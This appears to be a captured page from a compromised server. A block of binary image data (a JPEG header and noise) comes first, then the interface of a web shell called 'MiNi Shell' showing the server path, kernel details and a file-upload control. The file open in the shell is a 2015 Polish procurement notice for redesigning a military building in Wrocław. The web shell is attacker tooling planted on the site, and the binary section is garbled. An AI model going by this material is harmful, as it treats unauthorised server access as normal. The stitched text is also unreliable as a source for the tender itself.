JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150519/71827-N-2015.html

<p class="kh_header"><b>Wrocław: Opracowanie dokumentacji przedprojektowej i projektowej przebudowy budynku nr 7 - 8658 na wielofunkcyjny dla potrzeb Orkiestry Reprezentacyjnej Wojsk Lądowych ze zmianą sposobu użytkowania, w kompleksie wojskowym we Wrocławiu 
wraz z uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę, 
z późniejszym pełnieniem nadzoru autorskiego - zadanie 21223 i 21812.</b><br>
<b>Numer ogłoszenia: 71827 - 2015; data zamieszczenia: 19.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 261 65 68 40, faks 261 65 68 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rziwroclaw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji przedprojektowej i projektowej przebudowy budynku nr 7 - 8658 na wielofunkcyjny dla potrzeb Orkiestry Reprezentacyjnej Wojsk Lądowych ze zmianą sposobu użytkowania, w kompleksie wojskowym we Wrocławiu 
wraz z uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę, 
z późniejszym pełnieniem nadzoru autorskiego - zadanie 21223 i 21812..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonana dokumentacja projektowa winna zawierać wszystkie elementy niezbędne do prawidłowego, zgodnego z prawem i wymaganiami Zamawiającego dla osiągnięcia efektu rzeczowego tj. przebudowy budynku kuchni-stołówki na wielofunkcyjny dla potrzeb Orkiestry Reprezentacyjnej Wojsk Lądowych. Dokumentacja obejmować będzie wszystkie niezbędne roboty budowlane w stopniu szczegółowości pozwalającym na jednoznaczne ich zdefiniowanie.
Istniejący budynek nr 7 wymaga dostosowania do aktualnie obowiązujących przepisów pod względem funkcjonalnym, termicznym i bezpieczeństwa ze szczególnym uwzględnieniem standardów niskoenergetycznych poszczególnych przegród.
Realizacja dokumentacji projektowej etapami (wykaz opracowań):
 ETAP I	
1. Inwentaryzacja budynku do celów projektowych we wszystkich branżach,	po 1 płycie
2. Ekspertyza:
a) techniczna
b) mykologiczna, po 1 płycie
3. Program inwestycji wraz z koncepcją programowo-przestrzenną i aranżacją pomieszczeń, 2 egz.  
4. Wersja elektroniczna opracowań w myśl zapisów pkt. 9	, 1 płyta  
ETAP II		
5. Złożenie wniosku i uzyskanie decyzji   o ustaleniu lokalizacji inwestycji celu publicznego z Dolnośląskiego Urzędu Wojewódzkiego we Wrocławiu		 
6. Projekt budowlany we wszystkich branżach - TOM I, 5 egz. 
7. Projekt planu zagospodarowania terenu wraz z projektami wykonawczymi w obszarze zainwestowania we wszystkich branżach z uwzględnieniem zieleni, ciągów komunikacyjnych, dróg i placów  i małej architektury - TOM II, 5 egz. 
8. Projekty wykonawcze pozostające w zgodności z projektem budowlanym wraz z niezbędną dokumentacją warsztatową branży budowlanej, sanitarnej,  elektrycznej i niskoprądowej, po 4 egz. 
9. Projekt wykonawczy pozostający w zgodności z projektem budowlanym wraz z niezbędną dokumentacją warsztatową branży teletechnicznej  Systemu Sygnalizacji Włamania i Napadu, 4 egz. 
10. Scenariusz pożarowy, 2 egz.
11. Mapa do celów projektowych na bazie otrzymanej mapy do celów opiniodawczych, 1 egz. 
12. Przedmiary robót dla każdej z branż oddzielnie wraz z zagospodarowaniem terenu, po 1 egz. 
13. Kosztorysy inwestorskie dla każdej z branż oddzielnie wraz z zagospodarowaniem terenu, po 1 egz. 
14. Specyfikację techniczną wykonania i odbioru robót w podziale na branże wraz z zagospodarowaniem terenu, 3 egz. 
15. Informacja do sporządzenia planu  BiOZ i planu ochrony ppoż., 4 egz. 
16. Zestawienie kosztów zadania, 2 egz.  
17. Wersja elektroniczna opracowań w myśl zapisów pkt. 9, 1 płyta, 1 płyta 
18. Złożenie wniosku o zatwierdzenie projektu budowlanego i uzyskanie pozwolenia na budowę z Dolnośląskiego Urzędu Wojewódzkiego we Wrocławiu		
ETAP III		
19. Pełnienie nadzoru autorskiego 20 nadzorów.

Wykonawca w ramach wynagrodzenia za przedmiot zamówienia zrealizuje własnym staraniem niezbędne do poprawnego i pełnego wykonania dokumentacji stanowiącej przedmiot zamówienia: dokumenty, badania, ekspertyzy, decyzje, oceny techniczne, odkrywki, pomiary itp..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6, 71.22.10.00-3, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium 
w wysokości 4 200,00 zł.
2. Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego 
do dnia 09.06.2015 r. do godz. 10.00. Nie dopuszcza się wnoszenia wadium 
w formie gotówki do kasy Zamawiającego.
3. Wadium wniesione w postaci poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych oraz poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.) musi zawierać co najmniej:
1) nazwę i adres Wykonawcy, 
2) nazwę i adres beneficjenta, 
3) nazwę i adres gwaranta - poręczyciela,
4) nazwa zadania, na które składane jest wadium,
5) kwotę,
6) termin ważności,
7) wskazanie wszystkich przypadków powodujących utratę wadium zgodnie 
z art. art. 46 ust. 4a i  ust. 5 ustawy Pzp.
Wadium, o którym mowa w pkt 3 musi zostać złożone w kasie Zamawiającego (bud. RZI, pok. 20) w terminie do dnia - 09.06.2015 r. do godz. 10.00. 
W przypadku, gdy Wykonawca nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa 
w art. 46 ust. 3 ustawy Pzp, albo nie zgodził się na przedłużenie okresu związania 
ofertą, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt. 2.
4. W przypadku wnoszenia wadium w pieniądzu należy je wpłacić na konto 
NBP o/Okr we Wrocławiu 78 1010 1674 0030 7213 9120 1000, z dopiskiem: wadium dotyczące przetargu nieograniczonego na opracowanie dokumentacji przedprojektowej i projektowej przebudowy budynku nr 7/8658 na wielofunkcyjny dla potrzeb Orkiestry Reprezentacyjnej  Wojsk Lądowych ze zmianą sposobu użytkowania, w kompleksie wojskowym we Wrocławiu wraz z uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę, z późniejszym pełnieniem nadzoru autorskiego - zadanie 21223 i 21812.
5. Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, 
z zastrzeżeniem pkt 3.6.7. SIWZ.
6. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 
ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, 
o której mowa w art. 24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.
11. Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.
12. Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po wniesieniu wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że wykonał co najmniej jedno opracowanie dokumentacji projektowej na budowę - przebudowę - remont budynku o kubaturze nie mniejszej niż 8 000 m3 oraz wykazać się doświadczeniem dotyczącym minimum jednej realizacji dokumentacji projektowej budowy, rozbudowy systemów alarmowych, tj. Systemów Sygnalizacji Włamania i Napadu (SSWiN) i Alarmu Pożaru (SAP). Na potwierdzenie ww. warunku Wykonawca załączy do oferty wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane Formularz nr 3 (oryginał podpisany przez Wykonawcę), oraz załączeniem dowodów czy zostały wykonane lub 
są wykonywane należycie (oryginał lub kopia dokumentu poświadczona 
za zgodność z oryginałem przez Wykonawcę).
Za główną usługę Zamawiający uznaje usługę wskazaną w pkt 1.5.1 SIWZ.
Dowodem, o którym mowa powyżej jest poświadczenie, z tym, że w odniesieniu 
do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 
Wykonawca, w miejsce ww. poświadczeń, może przedkładać dokumenty potwierdzające należyte wykonanie roboty budowlanej, określone w § 1 ust. 1 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231).
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest 
w stanie uzyskać ww. poświadczenia, do oferty należy załączyć oświadczenie Wykonawcy wraz z uzasadnieniem przyczyn, o których mowa wyżej.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 9). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział 
w postępowaniu (np. jako podwykonawca, doradca, konsultant).
Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa 
w art. 22 ust. 1 pkt 2 Ustawy będzie polegał na wiedzy i doświadczeniu innych podmiotów na zasadach, określonych w art. 26 ust. 2b Ustawy, podmioty 
te są zobowiązane załączyć dokument, o którym mowa w pkt 1.1 ppkt 1.1.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że dysponuje odpowiednim potencjałem technicznym 
tj. akredytowanym systemem teleinformatycznym przeznaczonym do przetwarzania informacji niejawnych o klauzuli - ZASTRZEŻONE. 
W celu wykazania spełnienia ww. warunku, Wykonawca załączy do oferty stosowne oświadczenie.
2. Wykonawca zobowiązany jest posiadać kancelarię tajną lub pomieszczenia umożliwiające prowadzenie prac z niejawną dokumentacją o klauzuli ZASTRZEŻONE zgodnie z opracowaną przez Wykonawcę - Instrukcją sposobu i trybu przetwarzania informacji niejawnej o klauzuli ZASTRZEŻONE, oraz zakres i warunki stosowania środków bezpieczeństwa fizycznego w celu ich ochrony. W celu wykazania spełnienia ww. warunku, Wykonawca załączy 
do oferty stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że dysponuje projektantami przewidzianymi 
do realizacji:
1) projektantem - ze specjalnością konstrukcyjno - budowlaną - bez ograniczeń; Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
2) projektantem - ze specjalnością instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń; 
Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
3) projektantem branży instalacyjnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - bez ograniczeń;
Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
4) projektantem ze specjalnością drogową - bez ograniczeń; 
Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
5) uprawnionym geodetą - w zakresie opracowania mapy do celów projektowych;
6) pełnomocnikiem ds. ochrony informacji niejawnych, który posiada specjalistyczne przeszkolenie (zaświadczenie o odbyciu przeszkolenia) 
w zakresie ochrony informacji niejawnych wydane przez SKW lub ABW;
7) osobą pełniącą funkcję inspektora bezpieczeństwa teleinformatycznego, który posiada specjalistyczne przeszkolenie (zaświadczenie o odbyciu przeszkolenia) przez ABW lub SKW w zakresie bezpieczeństwa teleinformatycznego;
8) osobą pełniącą funkcję administratora systemu teleinformatycznego, który  posiada specjalistyczne przeszkolenie (zaświadczenie o odbyciu przeszkolenia) przez ABW lub SKW w zakresie administrowania systemem.
Wykonawca musi wykazać, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Na potwierdzenie ww. warunku Wykonawca dołaczy do oferty wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacją na temat ich kwalifikacji zawodowych, wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (oryginał podpisany przez Wykonawcę) - Formularz nr 4 i 4a oraz 
oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia (oryginał podpisany przez Wykonawcę) 
- Formularz nr 5.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 9). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział 
w postępowaniu (np. jako podwykonawca, doradca, konsultant).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Co najmniej jedno opracowanie dokumentacji projektowej na budowę -przebudowę -remont budynku o kubaturze nie mniejszej niż 8 000 m3 oraz wykazać się doświadczeniem dotyczącym minimum jednej realizacji dokumentacji projektowej budowy, rozbudowy systemów alarmowych, tj. Systemów Sygnalizacji Włamania i Napadu (SSWiN) i Alarmu Pożaru (SAP).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
